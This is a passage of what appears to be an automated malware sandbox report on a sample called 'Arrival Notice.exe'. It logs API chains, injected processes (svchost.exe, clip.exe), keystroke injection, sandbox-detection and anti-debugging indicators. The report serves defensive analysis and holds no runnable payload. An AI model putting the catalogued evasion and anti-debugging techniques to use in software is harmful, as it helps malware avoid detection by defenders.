            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeCode function: 2_2_04A9C6A6 push ecx; iretd 2_2_04A9C6A7
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeCode function: 2_2_04A8B6D3 push esp; ret 2_2_04A8B6DB
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeCode function: 2_2_04A9CE38 push ecx; retf 2_2_04A9CE39
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeCode function: 2_2_04A91E11 push 2823B84Bh; retf 2_2_04A91E21
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeCode function: 2_2_04A977BF push FFFFFFB8h; retf 2_2_04A977C1
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeCode function: 2_2_04A9773E push edi; ret 2_2_04A9773F
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeCode function: 2_2_04A98277 push edx; ret 2_2_04A98293
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeCode function: 2_2_04A90BF0 push ebx; retf 2_2_04A90BF3
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050827FA pushad ; ret 3_2_050827F9
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0508225F pushad ; ret 3_2_050827F9
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_003CF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_003CF98E
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_00441C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00441C41
            Source: C:\Users\user\Desktop\Arrival Notice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Arrival Notice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Found API chain indicative of sandbox detection
            Source: C:\Users\user\Desktop\Arrival Notice.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-95255
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\Arrival Notice.exeAPI/Special instruction interceptor: Address: 3523234
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0387096E rdtsc 1_2_0387096E
            Source: C:\Windows\SysWOW64\clip.exeWindow / User API: threadDelayed 4981Jump to behavior
            Source: C:\Windows\SysWOW64\clip.exeWindow / User API: threadDelayed 4990Jump to behavior
            Source: C:\Users\user\Desktop\Arrival Notice.exeAPI coverage: 3.9 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\clip.exeAPI coverage: 2.6 %
            Source: C:\Windows\SysWOW64\clip.exe TID: 6284Thread sleep count: 4981 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\clip.exe TID: 6284Thread sleep time: -9962000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\clip.exe TID: 6284Thread sleep count: 4990 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\clip.exe TID: 6284Thread sleep time: -9980000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe TID: 5796Thread sleep time: -80000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe TID: 5796Thread sleep time: -37500s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe TID: 5796Thread sleep count: 38 > 30Jump to behavior
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe TID: 5796Thread sleep time: -38000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\clip.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_0041DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0041DBBE
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_004268EE FindFirstFileW,FindClose,0_2_004268EE
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_0042698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0042698F
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_0041D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0041D076
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_0041D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0041D3A9
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_00429642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00429642
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_0042979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0042979D
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_00429B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00429B2B
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_00425C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00425C97
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_02F8BC20 FindFirstFileW,FindNextFileW,FindClose,3_2_02F8BC20
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_003B42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003B42DE
            Source: clip.exe, 00000003.00000002.4134866253.00000000032A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle
            Source: IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4135692843.00000000012AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll=
            Source: firefox.exe, 00000008.00000002.2149792797.000001F80780C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllss
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0387096E rdtsc 1_2_0387096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004173E3 LdrLoadDll,1_2_004173E3
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_0042EAA2 BlockInput,0_2_0042EAA2
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_003E2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_003E2622
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_003B42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003B42DE
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_003D4CE8 mov eax, dword ptr fs:[00000030h]0_2_003D4CE8
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_03523500 mov eax, dword ptr fs:[00000030h]0_2_03523500
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_035234A0 mov eax, dword ptr fs:[00000030h]0_2_035234A0
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_03521E70 mov eax, dword ptr fs:[00000030h]0_2_03521E70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382E388 mov eax, dword ptr fs:[00000030h]1_2_0382E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382E388 mov eax, dword ptr fs:[00000030h]1_2_0382E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382E388 mov eax, dword ptr fs:[00000030h]1_2_0382E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385438F mov eax, dword ptr fs:[00000030h]1_2_0385438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385438F mov eax, dword ptr fs:[00000030h]1_2_0385438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03828397 mov eax, dword ptr fs:[00000030h]1_2_03828397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03828397 mov eax, dword ptr fs:[00000030h]1_2_03828397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03828397 mov eax, dword ptr fs:[00000030h]1_2_03828397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EC3CD mov eax, dword ptr fs:[00000030h]1_2_038EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h]1_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h]1_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h]1_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h]1_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h]1_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h]1_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038383C0 mov eax, dword ptr fs:[00000030h]1_2_038383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038383C0 mov eax, dword ptr fs:[00000030h]1_2_038383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038383C0 mov eax, dword ptr fs:[00000030h]1_2_038383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038383C0 mov eax, dword ptr fs:[00000030h]1_2_038383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B63C0 mov eax, dword ptr fs:[00000030h]1_2_038B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE3DB mov eax, dword ptr fs:[00000030h]1_2_038DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE3DB mov eax, dword ptr fs:[00000030h]1_2_038DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE3DB mov ecx, dword ptr fs:[00000030h]1_2_038DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE3DB mov eax, dword ptr fs:[00000030h]1_2_038DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D43D4 mov eax, dword ptr fs:[00000030h]1_2_038D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D43D4 mov eax, dword ptr fs:[00000030h]1_2_038D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E3F0 mov eax, dword ptr fs:[00000030h]1_2_0384E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E3F0 mov eax, dword ptr fs:[00000030h]1_2_0384E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E3F0 mov eax, dword ptr fs:[00000030h]1_2_0384E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038663FF mov eax, dword ptr fs:[00000030h]1_2_038663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A30B mov eax, dword ptr fs:[00000030h]1_2_0386A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A30B mov eax, dword ptr fs:[00000030h]1_2_0386A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A30B mov eax, dword ptr fs:[00000030h]1_2_0386A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382C310 mov ecx, dword ptr fs:[00000030h]1_2_0382C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03850310 mov ecx, dword ptr fs:[00000030h]1_2_03850310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03908324 mov eax, dword ptr fs:[00000030h]1_2_03908324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03908324 mov ecx, dword ptr fs:[00000030h]1_2_03908324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03908324 mov eax, dword ptr fs:[00000030h]1_2_03908324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03908324 mov eax, dword ptr fs:[00000030h]1_2_03908324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B035C mov eax, dword ptr fs:[00000030h]1_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B035C mov eax, dword ptr fs:[00000030h]1_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B035C mov eax, dword ptr fs:[00000030h]1_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B035C mov ecx, dword ptr fs:[00000030h]1_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B035C mov eax, dword ptr fs:[00000030h]1_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B035C mov eax, dword ptr fs:[00000030h]1_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FA352 mov eax, dword ptr fs:[00000030h]1_2_038FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D8350 mov ecx, dword ptr fs:[00000030h]1_2_038D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0390634F mov eax, dword ptr fs:[00000030h]1_2_0390634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D437C mov eax, dword ptr fs:[00000030h]1_2_038D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E284 mov eax, dword ptr fs:[00000030h]1_2_0386E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E284 mov eax, dword ptr fs:[00000030h]1_2_0386E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B0283 mov eax, dword ptr fs:[00000030h]1_2_038B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B0283 mov eax, dword ptr fs:[00000030h]1_2_038B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B0283 mov eax, dword ptr fs:[00000030h]1_2_038B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038402A0 mov eax, dword ptr fs:[00000030h]1_2_038402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038402A0 mov eax, dword ptr fs:[00000030h]1_2_038402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h]1_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C62A0 mov ecx, dword ptr fs:[00000030h]1_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h]1_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h]1_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h]1_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h]1_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h]1_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h]1_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h]1_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h]1_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h]1_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039062D6 mov eax, dword ptr fs:[00000030h]1_2_039062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038402E1 mov eax, dword ptr fs:[00000030h]1_2_038402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038402E1 mov eax, dword ptr fs:[00000030h]1_2_038402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038402E1 mov eax, dword ptr fs:[00000030h]1_2_038402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382823B mov eax, dword ptr fs:[00000030h]1_2_0382823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B8243 mov eax, dword ptr fs:[00000030h]1_2_038B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B8243 mov ecx, dword ptr fs:[00000030h]1_2_038B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0390625D mov eax, dword ptr fs:[00000030h]1_2_0390625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382A250 mov eax, dword ptr fs:[00000030h]1_2_0382A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836259 mov eax, dword ptr fs:[00000030h]1_2_03836259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EA250 mov eax, dword ptr fs:[00000030h]1_2_038EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EA250 mov eax, dword ptr fs:[00000030h]1_2_038EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03834260 mov eax, dword ptr fs:[00000030h]1_2_03834260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03834260 mov eax, dword ptr fs:[00000030h]1_2_03834260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03834260 mov eax, dword ptr fs:[00000030h]1_2_03834260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382826B mov eax, dword ptr fs:[00000030h]1_2_0382826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03870185 mov eax, dword ptr fs:[00000030h]1_2_03870185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EC188 mov eax, dword ptr fs:[00000030h]1_2_038EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EC188 mov eax, dword ptr fs:[00000030h]1_2_038EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D4180 mov eax, dword ptr fs:[00000030h]1_2_038D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D4180 mov eax, dword ptr fs:[00000030h]1_2_038D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B019F mov eax, dword ptr fs:[00000030h]1_2_038B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B019F mov eax, dword ptr fs:[00000030h]1_2_038B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B019F mov eax, dword ptr fs:[00000030h]1_2_038B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B019F mov eax, dword ptr fs:[00000030h]1_2_038B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382A197 mov eax, dword ptr fs:[00000030h]1_2_0382A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382A197 mov eax, dword ptr fs:[00000030h]1_2_0382A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382A197 mov eax, dword ptr fs:[00000030h]1_2_0382A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F61C3 mov eax, dword ptr fs:[00000030h]1_2_038F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F61C3 mov eax, dword ptr fs:[00000030h]1_2_038F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE1D0 mov eax, dword ptr fs:[00000030h]1_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE1D0 mov eax, dword ptr fs:[00000030h]1_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE1D0 mov eax, dword ptr fs:[00000030h]1_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE1D0 mov eax, dword ptr fs:[00000030h]1_2_038AE1D0
